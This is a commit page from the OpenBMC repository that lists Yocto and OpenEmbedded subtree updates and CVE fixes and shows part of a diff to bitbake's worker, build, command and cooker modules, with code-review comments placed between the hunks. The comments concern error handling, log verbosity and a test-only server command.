author | Patrick Williams <patrick@stwcx.xyz> | 2022-02-08 22:42:21 +0300 |
---|---|---|
committer | Patrick Williams <patrick@stwcx.xyz> | 2022-02-15 23:13:23 +0300 |
commit | 23c9e5d72a3c26781493044644406f1e94df062d (patch) | |
tree | 968e2313c93331fd99f8d1380b992fb6c209a898 /poky | |
parent | fff6b3483881af637e01ecfe6853d5264c311442 (diff) | |
download | openbmc-23c9e5d72a3c26781493044644406f1e94df062d.tar.xz |
subtree updates
poky: ed4791c8b0..bba3233897:
Akash Hadke (1):
glibc: Add fix for data races in pthread_create and TLS access
Alexander Kanavin (25):
gnupg: update 2.2.21 -> 2.2.22
gnupg: update 2.2.23 -> 2.2.26
tcf-agent: fetching over git:// no longer works
qemurunner.py: print output from runqemu/qemu-system in stop()
qemurunner.py: handle getOutput() having nothing to read
selftest: disable virgl headless test
wic: keep rootfs_size as integer
testimage: symlink the task log and qemu console log to tmp/log/oeqa
bitbake: bitbake: correct the collections vs collections.abc deprecation
bitbake: bitbake: fix regexp deprecation warnings
bitbake: bitbake: do not import imp in layerindexlib
bitbake: bitbake: adjust parser error check for python 3.10 compatibility
bitbake: bitbake: correct deprecation warning in process.py
e2fsprogs: update to 1.45.6
linux-firmware: upgrade 20210511 -> 20210818
linux-firmware: upgrade 20210818 -> 20210919
wireless-regdb: upgrade 2021.04.21 -> 2021.07.14
wireless-regdb: upgrade 2021.07.14 -> 2021.08.28
ca-certificates: update 20210119 -> 20211016
tzdata: upgrade 2021a -> 2021d
tzdata: update 2021d -> 2021e
linux-firmware: upgrade 20210919 -> 20211027
libpcre/libpcre2: correct SRC_URI
lib/oe/reproducible: correctly set .git location when recursively looking for git repos
parselogs: add a couple systemd false positives
Alexandre Belloni (1):
oeqa/selftest/sstatetests: fix typo ware -> were
Andrej Valek (3):
mklibs-native: drop deprecated cpp17 exceptions
vim: add option to disable NLS support
libpsl: Add config knobs for runtime/builtin conversion choices
Andrey Zhizhikin (1):
lttng-modules: do not search in non-existing folder during install
Anuj Mittal (3):
glibc-version.inc: remove branch= from GLIBC_GIT_URI
gstreamer1.0: fix failing ptest
xserver-xorg: update CVE_PRODUCT
Armin Kuster (24):
glibc: Security fix CVE-2021-33574
glibc: Security fix for CVE-2021-38604
qemu: Security fix CVE-2020-25085
qemu: Security fix CVE-2020-25624
Qemu: Security fix for CVE-2020-25625/2021-3409/2020-17380
qemu: Security fix for CVE-2020-29443
qemu: Security fix CVE-2021-20221
qemu: Security fix CVE-2021-3544
qemu: Security fixes CVE-2021-3545/6
binutils: Security fix for CVE-2021-3549
binutils: Security fix for CVE-2020-16593
lz4: Security Fix for CVE-2021-3520
xserver-xorg: Security fix for CVE-2020-14360/-25712
go: Several Security fixes
libgcrypt: Security fix CVE-2021-33560
apr: Security fix for CVE-2021-35940
libsndfile: Security fix for CVE-2021-3246
qemu: Security fix CVE-2020-12829
qemu: Security fix for CVE-2020-27617
qemu: Security fix for CVE-2020-28916
nettle: Security fix for CVE-2021-3580
nettle: Security fix for CVE-2021-20305
tar: ignore node-tar CVEs
poky.yaml: fedora33: add missing pkgs
Bruce Ashfield (21):
linux-yocto/5.4: update to v5.4.142
parselogs.py: ignore intermittent CD/DVDROM identification failure
linux-yocto/5.4: update to v5.4.143
linux-yocto/5.4: update to v5.4.144
linux-yocto/5.4: update to v5.4.149
linux-yocto/5.4: update to v5.4.150
linux-yocto/5.4: update to v5.4.153
linux-yocto/5.4: update to v5.4.154
linux-yocto/5.4: update to v5.4.155
linux-yocto/5.4: update to v5.4.156
linux-yocto/5.4: update to v5.4.158
linux-yocto/5.4: update to v5.4.159
linux-yocto/5.4: update to v5.4.162
linux-yocto/5.4: update to v5.4.163
linux-yocto/5.4: update to v5.4.165
linux-yocto/5.4: update to v5.4.167
linux-yocto/5.4: update to v5.4.169
linux-yocto/5.4: update to v5.4.170
linux-yocto/5.4: update to v5.4.171
linux-yocto/5.4: update to v5.4.172
kernel: introduce python3-dtschema-wrapper
Chandana kalluri (1):
scriptutils.py: Add check before deleting path
Changqing Li (1):
gdk-pixbuf: fix CVE-2021-20240
Chris Laplante (1):
bitbake: compat.py: remove file since it no longer actually implements anything
Christian Eggers (1):
binutils: Fix a missing break in case statement
Claudius Heine (1):
rng-tools: add systemd-udev-settle wants to service
Claus Stovgaard (1):
cups: Fix missing installation of cups sysv init scripts
Daniel Gomez (1):
os-release: Add DISTRO_CODENAME as vardeps for do_compile
Daniel McGregor (1):
bitbake.conf: Add gpg-agent as a host tool
Denys Dmytriyenko (1):
make-mod-scripts: pass CROSS_COMPILE to configure and build
Dhruva Gole (1):
scripts/checklayer/common.py: Fixed a minor grammatical error
Eero Aaltonen (1):
cmake: FindGTest: Add target for gmock library
Ernst Sjöstrand (1):
dropbear: Fix CVE-2020-36254
Hongxu Jia (1):
nativesdk-pseudo: Fix to work with glibc 2.34 systems
Jate Sujjavanich (3):
libdnf: Backport bugfix for upgrade calc
dnf: Backport bugfix for upgrade
bitbake: hashserv: specify loop for asyncio in python < 3.6
Jon Mason (4):
Update mailing list address
core-image-sato: Fix runqemu error for qemuarmv5
oeqa/manual: Fix no longer valid URLs
scripts/lib/wic/help.py: Update Fedora Kickstart URLs
Jose Quaresma (3):
patch.bbclass: when the patch fails show more info on the fatal error
sstate: fix touching files inside pseudo
sstate: another fix for touching files inside pseudo
Joshua Watt (3):
bitbake: server: Fix early parsing errors preventing zombie bitbake
classes/reproducible_build: Use atomic rename for SDE file
oeqa: reproducible: Fix test not producing diffs
Justin Bronder (1):
bitbake: hashserv: let asyncio discover the running loop
Kai Kang (2):
squashfs-tools: fix CVE-2021-40153
speex: fix CVE-2020-23903
Khem Raj (5):
m4: Do not use SIGSTKSZ
gpgme: Use glibc provided closefrom API when available
webkitgtk: Fix reproducibility in minibrowser
lrzsz: Use Cross AR during compile
libunwind: Backport a fix for -fno-common option to compile
Konrad Weihmann (1):
cve-check: add lockfile to task
Lee Chee Yang (1):
qemu: fix CVE-2021-3527
Marco Felsch (1):
bitbake: bitbake: bitbake-layers: add skip reason to output
Marek Vasut (4):
image_types: Restore pre-btrfs-tools 4.14.1 mkfs.btrfs shrink behavior
piglit: upgrade to latest revision
weston: Backport patches to always activate the top-level surface
Revert "weston: Use systemd notify,"
Mark Hatle (2):
externalsrc: Work with reproducible_build
reproducible_build: Remove BUILD_REPRODUCIBLE_BINARIES checking
Markus Volk (2):
util-linux: disable raw
wic:direct.py: ignore invalid mountpoints during fstab update
Marta Rybczynska (5):
lzo: add CVE_PRODUCT
python3: upgrade 3.8.11 -> 3.8.12
libgcrypt: solve CVE-2021-33560 and CVE-2021-40528
bluez: fix CVE-2021-0129
grub: fix CVE-2020-14372 and CVE-2020-27779
Matt Madison (1):
layer.conf: fix syntax error in PATH setting
Michael Halstead (3):
uninative: Upgrade to 3.3, support glibc 2.34
uninative: Upgrade to 3.4
releases: update to include 3.1.13
Michael Opdenacker (5):
documentation: conf.py: explicit which version of bitbake objects.inv is used
available release updates
remove reference to BB_SETSCENE_VERIFY_FUNCTION2
documentation: further updates for 3.1.13
ref-manual: fix patch documentation
Mike Crowe (1):
curl: Fix CVE-2021-22946 and CVE-2021-22947, whitelist CVE-2021-22945
Mikko Rapeli (1):
openssl: update from 1.1.1k to 1.1.1l
Mingli Yu (3):
python3-magic: add the missing rdepends
bootchart2: remove wait_boot logic
wic: use shutil.which
Minjae Kim (5):
vim: fix CVE-2021-3778
vim: fix 2021-3796
git: fix CVE-2021-40330
vim: fix CVE-2021-4069
inetutils: fix CVE-2021-40491
Neetika Singh (1):
glib-2.0: Add security fixes
Nicolas Dechesne (1):
rt-tests: set branch name in SRC_URI
Oleksandr Kravchuk (1):
mirrors.bbclass: remove dead infozip mirrors
Oleksandr Popovych (1):
utils: Reduce the number of calls to the "dirname" command
Ovidiu Panait (2):
dbus-test: Remove EXTRA_OECONF_X configs
dbus,dbus-test: Move common parts to dbus.inc
Pavel Zhukov (3):
weston: Use systemd notify,
busybox: Fix for CVE-2021-42374
busybox: Fix for CVE-2021-42376
Peter Bergin (1):
systemd: add packageconfig for wheel-group
Purushottam Choudhary (1):
lighttpd: Add patch for reuse large memory chunks
Quentin Schulz (1):
README.OE-Core.md: update URLs
Ralph Siemsen (1):
tar: filter CVEs using vendor name
Ranjitsinh Rathod (6):
rpm: Add fix for CVE-2021-20266
rpm: Handle proper return value to avoid major issues
systemd: Add fix for systemd-networkd crash during free
curl: Whitelist CVE-2021-22897
ncurses: Fix for CVE-2021-39537
libsolv: update tag for missing CVEs
Ricardo Ribalda Delgado (1):
wic: misc: Do not find for executables in ASSUME_PROVIDED
Richard Purdie (91):
gnupg: upgrade 2.2.20 -> 2.2.21
sdk: Decouple default install path from built in path
xdg-utils: Add fix for CVE-2020-27748
oeqa/runtime/parselogs: Make DVD ata error apply to all qemux86 machines
flex: Add CVE-2019-6293 to exclusions for checks
go: Exclude CVE-2021-29923 from report list
build-appliance-image: Update to dunfell head revision
poky: Use SDKPATHINSTALL instead of SDKPATH
build-appliance-image: Update to dunfell head revision
bitbake: tests/fetch2: Use our own git server for dtc test repo
vim: Backport fix for CVE-2021-3770
useradd: Ensure preinst data is expanded correctly in pkgdata
bash: Ensure deterministic build
bitbake: ui/taskexp: Improve startup exception handling
bitbake: ui/taskexp: Fix to work with empty build directories
bitbake: build: Match markup to real function name
bitbake: build: Handle SystemExit in python tasks correctly
bitbake: process: Don't include logs in error message if piping them
bitbake: build: Avoid duplicating logs in verbose mode
bitbake: build: Catch and error upon circular task references
bitbake: data_smart: Improve error display for handled exceptions
bitbake: cookerdata: Improve missing core layer error message
bitbake: cookerdata: Show error for no BBLAYERS in bblayers.conf
bitbake: bitbake-worker: Improve error handling
bitbake: cookerdata: Show a readable error for invalid multiconfig name
bitbake: build/msg: Cleanup verbose option handling
mtd-utils: upgrade 2.1.1 -> 2.1.2
pybootchart: Avoid divide by zero
oeqa/qemurunner: Use oe._exit(), not sys.exit()
libc_package/buildstats: Fix python regex quoting warnings
oeqa/selftest/gotoolchain: Fix temp file cleanup
oeqa/buildproject: Ensure temp directories are cleaned up
glew: Stop polluting /tmp during builds
bitbake: test/fetch: Update urls to match upstream branch name changes
bitbake: fetch2/git: Avoid races over mirror tarball creation
bitbake: fetch2/git: Use os.rename instead of mv
multilib: Avoid sysroot race issues when multilib enabled
pseudo: Fix to work with glibc 2.34 systems
pseudo: Update with fcntl and glibc 2.34 fixes
package: Ensure pclist files are deterministic and don't use full paths
mesa: Ensure megadrivers runtime mappings are deterministic
gnupg: Be deterministic about sendmail
libtool: Fix lto option passing for reproducible builds
libtool: Allow libtool-cross to reproduce
gobject-introspection: Don't write $HOME into scripts
externalsrc: Fix a source date epoch race in reproducible builds
libxml2: Use python3targetconfig to fix reproducibility issue
libnewt: Use python3targetconfig to fix reproducibility issue
python3: Add a fix for a make install race
rpm: Deterministically set vendor macro entry
reproducible_build: Work around caching issues
base: Clean up unneeded len() calls
base: Use repr() for printing exceptions
reproducible_build: Drop obsolete sstate workaround
git: Fix determinism issue
bitbake: fetch/git: Handle github dropping git:// support
bitbake: tests/fetch2: Fix quoting warning
bitbake: tests/fetch: Update github urls
bitbake: tests/fetch: Update pcre.org address after github changes
scripts/convert-srcuri: Backport SRC_URI conversion script from master branch
meta/scripts: Manual git url branch additions
bitbake: fetch/wget: Add timeout for checkstatus calls (30s)
linunistring: Add missing gperf-native dependency
pseudo: Add in ability to flush database with shutdown request
pseudo: Add fcntl64 wrapper
mirrors: Add uninative mirror on kernel.org
sstate: Ensure SDE is accounted for in package task timestamps
sstate: Avoid deploy_source_date_epoch sstate when unneeded
mirrors: Add kernel.org sources mirror for downloads.yoctoproject.org
build-appliance-image: Update to dunfell head revision
bitbake: command: Ensure exceptions inheriting from BBHandledException are visible
bitbake: tinfoil: When sending commands we need to process events
bitbake: process/knotty: Improve early exception handling
scripts/oe-package-browser: Handle no packages being built
reproducible_build/package_XXX: Ensure SDE task is in dependency chain
bitbake: cooker: Ensure reparsing is handled correctly
bitbake: bblayers/action: When adding layers, catch BBHandledException
buildhistory: Fix srcrevs output
oeqa/parselogs: Fix quoting
gcc: Add CVE-2021-37322 to the list of CVEs to ignore
build-appliance-image: Update to dunfell head revision
bitbake: cooker/command: Add a dummy event for tinfoil testing
openssl: Add reproducibility fix
oeqa/selftest/bbtests: Use YP sources mirror instead of GNU
oeqa/selftest/tinfoil: Update to use test command
scripts: Update to use exec_module() instead of load_module()
bitbake: utils: Update to use exec_module() instead of load_module()
bitbake: tests/fetch: Drop gnu urls from wget connectivity test
expat: Update HOMEPAGE to current url
lttng-tools: Add missing DEPENDS on bison-native
build-appliance-image: Update to dunfell head revision
Robert P. J. Day (1):
common-licenses: add "Unlicense" license file
Ross Burton (20):
cpio: backport fix for CVE-2021-38185
libsoup-2.4: remove obsolete intltool dependency
uninative: Improve glob to handle glibc 2.34
devtool: fix modify with patches in override directories
sstate: don't silently handle all exceptions in sstate_checkhashes
oe/license: implement ast.NodeVisitor.visit_Constant
license.bbclass: implement ast.NodeVisitor.visit_Constant
oe/utils: log exceptions in ThreadedWorker functions
testimage: fix unclosed testdata file
oeqa/runtime: load modules using importlib
oeqa/runtime: search sys.path explicitly for modules
vim: fix CVE-2021-3796, CVE-2021-3872, and CVE-2021-3875
vim: add patch number to CVE-2021-3778 patch
vim: fix CVE-2021-3927 and CVE-2021-3928
gmp: fix CVE-2021-43618
openssh: remove redundant BSD license
vim: fix CVE-2021-3968 and CVE-2021-3973
runqemu: check the qemu PID has been set before kill()ing it
cve-update-db-native: use fetch task
xserver-xorg: whitelist two CVEs
Sakib Sajal (7):
qemu: fix CVE-2021-20181
qemu: fix CVE-2021-3416
qemu: fix CVE-2021-20257
qemu: fix CVE-2021-3582
qemu: fix CVE-2021-3607
qemu: fix CVE-2021-3608
qemu: fix CVE-2021-3682
Saloni (1):
ffmpeg: Add fix for CVEs
Sana Kazi (1):
busybox: Fix multiple security issues in awk
Saul Wold (1):
gnupg: uprev 2.2.22 -> 2.2.23
Stefan Herbrechtsmeier (2):
recipetool: Set master branch only as fallback
selftest/devtool: Check branch in git fetch
Stefano Babic (1):
mtd-utils: upgrade 2.1.2 -> 2.1.3
Steve Sakoman (36):
documentation: prepare for 3.1.11 release
poky.conf: Bump version for 3.1.11 release
connman: add CVE_PRODUCT
gcc: fix missing dependencies for selftests
util-linux: Fix reproducibility
target/ssh.py: add HostKeyAlgorithms option to test commands
poky.conf: Add fedora 34 as a supported distro
poky.conf: Add debian 11 as a supported distro
selftest/reproducible: adjust exclusion list for dunfell
waffle: old website is down, update to new project URLs
stress-ng: convert to git, website is down
stress-ng: improve reproducibility
meta: Add explict branch to git SRC_URIs, handle github url changes
poky.conf: Bump version for 3.1.12 release
ref-system-requirements.rst: Add Debian 11 to list of supported distros
ref-system-requirements.rst: Add Fedora 34 to list of supported distros
documentation: prepare for 3.1.12 release
python3-magic: add missing DEPENDS
selftest/reproducible: add webkitgtk back to exclusion list for dunfell
Revert "vim: fix 2021-3796"
bind: update to 9.11.33
bind: update to 9.11.34
bind: update to 9.11.35
poky.conf: Bump version for 3.1.13 release
cve-extra-exclusions: add db CVEs to exclusion list
selftest: skip virgl test on centos 8 entirely
selftest: skip virgl test on fedora 34 entirely
libpcre2: update SRC_URI
selftest: skip virgl test on fedora 35
asciidoc: properly detect and compare Python versions >= 3.10
valgrind: skip flakey ptest (gdbserver_tests/hginfo)
oeqa/selftest/cases/tinfoil.py: increase timeout 60->120s test_wait_event
expat fix CVE-2022-22822 through CVE-2022-22827
expat: fix CVE-2021-45960
expat: fix CVE-2021-46143
poky.conf: Bump version for 3.1.14 release
Teoh Jay Shen (2):
oeqa/runtime/parselogs: modified drm error in common errors list
linux-yocto/5.4: update genericx86* machines to v5.4.158
Tim Orling (1):
scripts/buildhistory-diff: drop use of distutils
Tom Pollard (2):
bzip2: Update soname for libbz2 1.0.8
libsamplerate0: Set correct soname for 0.1.9
Visa Hankala (1):
iputils: Fix regression of arp table update
Wang Mingyu (6):
gnupg: upgrade 2.2.26 -> 2.2.27
dbus: upgrade 1.12.16 -> 1.12.18
dbus-test: upgrade 1.12.16 -> 1.12.18
dbus: upgrade 1.12.18 -> 1.12.20
e2fsprogs: upgrade 1.45.6 -> 1.45.7
openssh: Improve LICENSE to show BSD license variants.
William A. Kennington III (1):
rm_work.bbclass: Fix for files starting with -
Yi Zhao (1):
oeqa: fix warnings for append operators combined with +=
jbouchard (1):
Use the label provided when formating a dos partition
sana kazi (3):
openssh: Fix CVE-2021-28041
openssh: Fix CVE-2021-41617
openssh: Whitelist CVE-2016-20012
wangmy (1):
linux-firmware: upgrade 20211027 -> 20211216
meta-raspberrypi: 59c2d6f7a8..934064a019:
Changqing Li (1):
99-com.rules: fix error invalid substitution type
Marcel Hamer (1):
recipes: Update SRC_URI protocols for github
Pavel Zhukov (1):
linux-firmware-rpidistro: Use buster branch instead of master
meta-security: 6466c6fb02..b76698c788:
Armin Kuster (1):
linux-%_5.%.bbappend: drop recipe
meta-openembedded: 4a0d93d250..ab9fca485e:
Alexander Thoma (1):
keyutils: fix install path
Anastasios Kavoukis (1):
pm-qa: fix paths for shell scripts
Andreas Weger (3):
spirv-tools: Define SRCREV_FORMAT
grpc: Define SRCREV_FORMAT
drdb-utils: Define SRCREV_FORMAT
Armin Kuster (7):
xterm: Security fix for CVE-2021-27135
tcpdump: Exclude CVE-2020-8036 from check
nss: Two Security fixes CVE-2020-6829 and 12400
dnsmasq: Security fix CVE-2021-3448
Apache: Several CVE fixes
redis: update to 5.0.14
recipes: Update SRC_URI branch and protocols
Armin kuster (1):
dovecot: refresh patches
Changqing Li (1):
apache2: upgrade 2.4.46 -> 2.4.48
Ernst Sjöstrand (1):
libmicrohttpd: Add patch to fix CVE-2021-3466
Gianfranco (3):
dlt-daemon: update to 2.18.5
dlt-daemon: fix build failure when dlt-dbus is enabled, due to missing service file.
dlt-daemon: update from 2.18.6 to 2.18.7
Gianfranco Costamagna (3):
dlt-daemon: fix build with upstream-proposed patch for MUSL libc
dlt-daemon: superseed upstream pr #238 patch with pr #245 due to unexpected behaviour
dlt-daemon: update to new release 2.18.6
Jeremy Puhlman (1):
c-ares: switch from master to main
Khem Raj (2):
gst-shark: Define SRCREV_FORMAT
android-tools: Define SRCREV_FORMAT
Konrad Weihmann (1):
gattlib: remove includedir from base package
Marek Vasut (1):
dstat: Add missing python-six runtime dependency
Marta Rybczynska (1):
jansson: whitelist CVE-2020-36325
Martin Jansa (1):
sdbus-c++: don't fetch googletest during do_configure
Maíra Canal via (1):
python3-fasteners: update 0.15 -> 0.16.3
Neetika Singh (1):
c-ares: Add fix for CVE-2021-3672
Pierre-Jean Texier (1):
stunnel: upgrade 5.56 -> 5.57
Purushottam Choudhary (1):
tcpdump: Update CVE-2020-8037 tag
Ranjitsinh Rathod (1):
nss: Fix CVE-2020-12403
Richard Purdie (1):
gattlib: Place pkgconfig file in correct package
Robert Joslyn (1):
postgresql: Update to 12.9
Spectrejan (1):
brotli: add patch to fix CVE-2020-8927
Yi Zhao (3):
krb5: fix CVE-2021-36222
postfix: fix build with glibc 2.34
postfix: upgrade 3.4.12 -> 3.4.23
Zang Ruochen (1):
c-ares: upgrade 1.16.0 -> 1.16.1
lumag (1):
lmsensors: do not depend on lmsensors-isatools on non-x86
sana kazi (4):
dovecot: Fix CVE-2020-12100
dovecot: Fix CVE-2020-12673
dovecot: Fix CVE-2020-12674
nss: Fix CVE-2021-43527
wangmy (1):
apache2: upgrade 2.4.48 -> 2.4.49
Signed-off-by: Patrick Williams <patrick@stwcx.xyz>
Change-Id: Ic7c24b8b9d1566d6273e388c20d242dbfeaf08de
Diffstat (limited to 'poky')
503 files changed, 18903 insertions, 1152 deletions
diff --git a/poky/README.OE-Core b/poky/README.OE-Core index 521916cd4f..2f2127fb03 100644 --- a/poky/README.OE-Core +++ b/poky/README.OE-Core @@ -6,24 +6,24 @@ of OpenEmbedded. It is distro-less (can build a functional image with DISTRO = "nodistro") and contains only emulated machine support. For information about OpenEmbedded, see the OpenEmbedded website: - http://www.openembedded.org/ + https://www.openembedded.org/ The Yocto Project has extensive documentation about OE including a reference manual which can be found at: - http://yoctoproject.org/documentation + https://docs.yoctoproject.org/ Contributing ------------ Please refer to -http://www.openembedded.org/wiki/How_to_submit_a_patch_to_OpenEmbedded +https://www.openembedded.org/wiki/How_to_submit_a_patch_to_OpenEmbedded for guidelines on how to submit patches. Mailing list: - http://lists.openembedded.org/mailman/listinfo/openembedded-core + https://lists.openembedded.org/g/openembedded-core Source code: - http://git.openembedded.org/openembedded-core/ + https://git.openembedded.org/openembedded-core/ diff --git a/poky/bitbake/bin/bitbake-worker b/poky/bitbake/bin/bitbake-worker index 97cc0fd60f..e3ce01eec8 100755 --- a/poky/bitbake/bin/bitbake-worker +++ b/poky/bitbake/bin/bitbake-worker @@ -413,9 +413,9 @@ class BitbakeWorker(object): def handle_workerdata(self, data): self.workerdata = pickle.loads(data) + bb.build.verboseShellLogging = self.workerdata["build_verbose_shell"] + bb.build.verboseStdoutLogging = self.workerdata["build_verbose_stdout"] bb.msg.loggerDefaultLogLevel = self.workerdata["logdefaultlevel"] - bb.msg.loggerDefaultVerbose = self.workerdata["logdefaultverbose"] - bb.msg.loggerVerboseLogs = self.workerdata["logdefaultverboselogs"] bb.msg.loggerDefaultDomains = self.workerdata["logdefaultdomain"] for mc in self.databuilder.mcdata: self.databuilder.mcdata[mc].setVar("PRSERV_HOST", self.workerdata["prhost"]) 
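Review bot: In `handle_workerdata` (bitbake-worker, @@ -413) the two added assignments index `self.workerdata["build_verbose_shell"]` and `self.workerdata["build_verbose_stdout"]` directly, so a payload that lacks the new keys fails with a KeyError instead of falling back to quiet logging. If the cooker and the worker can ever run from different trees, `self.workerdata.get("build_verbose_shell", False)` (and the same for `build_verbose_stdout`) would keep the defaults that build.py declares. The unchanged `pickle.loads(data)` just above deserialises whatever arrives on the worker's input, which is safe only while that channel is written by the parent bitbake process alone; a comment such as `# workerdata is a pickle from the parent cooker; never feed this from an untrusted source` would record that assumption. The method body continues past the end of the hunk.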
@@ -505,9 +505,11 @@ except BaseException as e: import traceback sys.stderr.write(traceback.format_exc()) sys.stderr.write(str(e)) +finally: + worker_thread_exit = True + worker_thread.join() -worker_thread_exit = True -worker_thread.join() - -workerlog_write("exitting") +workerlog_write("exiting") +if not normalexit: + sys.exit(1) sys.exit(0) diff --git a/poky/bitbake/lib/bb/build.py b/poky/bitbake/lib/bb/build.py index 23b6ee455f..aaada8a18b 100644 --- a/poky/bitbake/lib/bb/build.py +++ b/poky/bitbake/lib/bb/build.py @@ -27,6 +27,9 @@ from bb import data, event, utils bblogger = logging.getLogger('BitBake') logger = logging.getLogger('BitBake.Build') +verboseShellLogging = False +verboseStdoutLogging = False + __mtime_cache = {} def cached_mtime_noerror(f): @@ -290,8 +293,8 @@ def exec_func_python(func, d, runfile, cwd=None): lineno = int(d.getVarFlag(func, "lineno", False)) bb.methodpool.insert_method(func, text, fn, lineno - 1) - comp = utils.better_compile(code, func, "exec_python_func() autogenerated") - utils.better_exec(comp, {"d": d}, code, "exec_python_func() autogenerated") + comp = utils.better_compile(code, func, "exec_func_python() autogenerated") + utils.better_exec(comp, {"d": d}, code, "exec_func_python() autogenerated") finally: bb.debug(2, "Python function %s finished" % func) @@ -371,7 +374,7 @@ def exec_func_shell(func, d, runfile, cwd=None): bb.data.emit_func(func, script, d) - if bb.msg.loggerVerboseLogs: + if verboseShellLogging or bb.utils.to_boolean(d.getVar("BB_VERBOSE_LOGS", False)): script.write("set -x\n") if cwd: script.write("cd '%s'\n" % cwd) @@ -391,7 +394,7 @@ exit $ret if fakerootcmd: cmd = [fakerootcmd, runfile] - if bb.msg.loggerDefaultVerbose: + if verboseStdoutLogging: logfile = LogTee(logger, StdoutNoopContextManager()) else: logfile = StdoutNoopContextManager() 
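Review bot: The new condition in `exec_func_shell` (build.py, @@ -371) enables `set -x` whenever `BB_VERBOSE_LOGS` is true in the task datastore, and shell tracing writes every expanded command line into the run log, including any credential or token a task passes as an argument. That is worth stating next to the `script.write("set -x\n")` line, for example `# set -x traces expanded values; logs from verbose builds can contain secrets and should be treated accordingly`. The function starts and ends outside the hunk, so whether the log is later published or uploaded cannot be judged from here.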
@@ -587,11 +590,15 @@ def _exec_task(fn, task, d, quieterr): except bb.BBHandledException: event.fire(TaskFailed(task, fn, logfn, localdata, True), localdata) return 1 - except Exception as exc: + except (Exception, SystemExit) as exc: if quieterr: event.fire(TaskFailedSilent(task, fn, logfn, localdata), localdata) else: errprinted = errchk.triggered + # If the output is already on stdout, we've printed the information in the + # logs once already so don't duplicate + if verboseStdoutLogging: + errprinted = True logger.error(str(exc)) event.fire(TaskFailed(task, fn, logfn, localdata, errprinted), localdata) return 1 @@ -901,6 +908,8 @@ def tasksbetween(task_start, task_end, d): def follow_chain(task, endtask, chain=None): if not chain: chain = [] + if task in chain: + bb.fatal("Circular task dependencies as %s depends on itself via the chain %s" % (task, " -> ".join(chain))) chain.append(task) for othertask in tasks: if othertask == task: diff --git a/poky/bitbake/lib/bb/command.py b/poky/bitbake/lib/bb/command.py index 6abf38668b..98c945edb5 100644 --- a/poky/bitbake/lib/bb/command.py +++ b/poky/bitbake/lib/bb/command.py @@ -74,8 +74,12 @@ class Command: result = command_method(self, commandline) except CommandError as exc: return None, exc.args[0] - except (Exception, SystemExit): + except (Exception, SystemExit) as exc: import traceback + if isinstance(exc, bb.BBHandledException): + # We need to start returning real exceptions here. Until we do, we can't + # tell if an exception is an instance of bb.BBHandledException + return None, "bb.BBHandledException()\n" + traceback.format_exc() return None, traceback.format_exc() else: return result, None 
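Review bot: With `SystemExit` added to the `except` clause in `_exec_task` (@@ -587), `logger.error(str(exc))` prints only the exit status, for example `1`, or an empty string for a bare `sys.exit()`, so the log gives no hint that the task left through `sys.exit`. Something like `logger.error("%s: %s" % (type(exc).__name__, exc))` keeps the message readable for both exception kinds. A python task that calls `sys.exit(0)` is now also reported as failed; if that is intended, a one-line comment saying so would prevent a later "fix". The enclosing `try` begins outside the hunk.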
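Review bot: In `follow_chain` (@@ -901) the fatal message joins `chain` before `task` is appended, so the printed path stops one step short of the repeated task and the reader has to close the cycle mentally. Using `" -> ".join(chain + [task])` shows the full loop. The unchanged `if not chain: chain = []` also replaces an empty list passed by a caller with a new one, which is harmless here but worth knowing when reading the recursion.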
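Review bot: The `"bb.BBHandledException()\n"` prefix added in command.py (@@ -74) is an in-band marker inside the error string, so whatever consumes it has to recognise the exception by string comparison and the literal must stay byte-identical on both sides; no consumer is visible in this hunk. A module-level constant, for example `HANDLED_EXCEPTION_MARKER = "bb.BBHandledException()\n"`, referenced from both ends would make that coupling explicit until real exceptions can be returned, as the added comment already anticipates. The full `traceback.format_exc()` text is still sent back to the client in both branches, which is fine for a local UI but worth keeping in mind where the command interface is exposed over the network.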
@@ -620,6 +624,16 @@ class CommandsAsync: command.finishAsyncCommand() findFilesMatchingInDir.needcache = False + def testCookerCommandEvent(self, command, params): + """ + Dummy command used by OEQA selftest to test tinfoil without IO + """ + pattern = params[0] + + command.cooker.testCookerCommandEvent(pattern) + command.finishAsyncCommand() + testCookerCommandEvent.needcache = False + def findConfigFilePath(self, command, params): """ Find the path of the requested configuration file diff --git a/poky/bitbake/lib/bb/compat.py b/poky/bitbake/lib/bb/compat.py deleted file mode 100644 index 49356681ab..0000000000 --- a/poky/bitbake/lib/bb/compat.py +++ /dev/null @@ -1,10 +0,0 @@ -# -# SPDX-License-Identifier: GPL-2.0-only -# - -"""Code pulled from future python versions, here for compatibility""" - -from collections import MutableMapping, KeysView, ValuesView, ItemsView, OrderedDict -from functools import total_ordering - - diff --git a/poky/bitbake/lib/bb/cooker.py b/poky/bitbake/lib/bb/cooker.py index 730cdc56ff..ac54d4378d 100644 --- a/poky/bitbake/lib/bb/cooker.py +++ b/poky/bitbake/lib/bb/cooker.py @@ -411,10 +411,7 @@ class BBCooker: self.data.disableTracking() def parseConfiguration(self): - # Set log file verbosity - verboselogs = bb.utils.to_boolean(self.data.getVar("BB_VERBOSE_LOGS", False)) - if verboselogs: - bb.msg.loggerVerboseLogs = True + self.updateCacheSync() # Change nice level if we're asked to nice = self.data.getVar("BB_NICE_LEVEL") @@ -1022,6 +1019,11 @@ class BBCooker: if matches: bb.event.fire(bb.event.FilesMatchingFound(filepattern, matches), self.data) + def testCookerCommandEvent(self, filepattern): + # Dummy command used by OEQA selftest to test tinfoil without IO + matches = ["A", "B"] + bb.event.fire(bb.event.FilesMatchingFound(filepattern, matches), self.data) + def findProviders(self, mc=''): return bb.providers.findProviders(self.databuilder.mcdata[mc], self.recipecaches[mc], self.recipecaches[mc].pkg_pn) 
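Review bot: `testCookerCommandEvent` is described as a selftest helper, yet it is added to `CommandsAsync` (command.py, @@ -620) and therefore joins the command set that every client of the server can invoke, presumably including remote clients when the XMLRPC interface is enabled. The docstring should say that explicitly, e.g. `Test-only: fires a FilesMatchingFound event with fixed data; performs no I/O and must stay side-effect free`. `pattern = params[0]` is also unchecked and raises IndexError on an empty parameter list. The matching `BBCooker.testCookerCommandEvent` in the cooker.py hunk (@@ -1022) only fires an event with the constant matches `["A", "B"]`, so the exposure as written is limited to emitting a dummy event.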
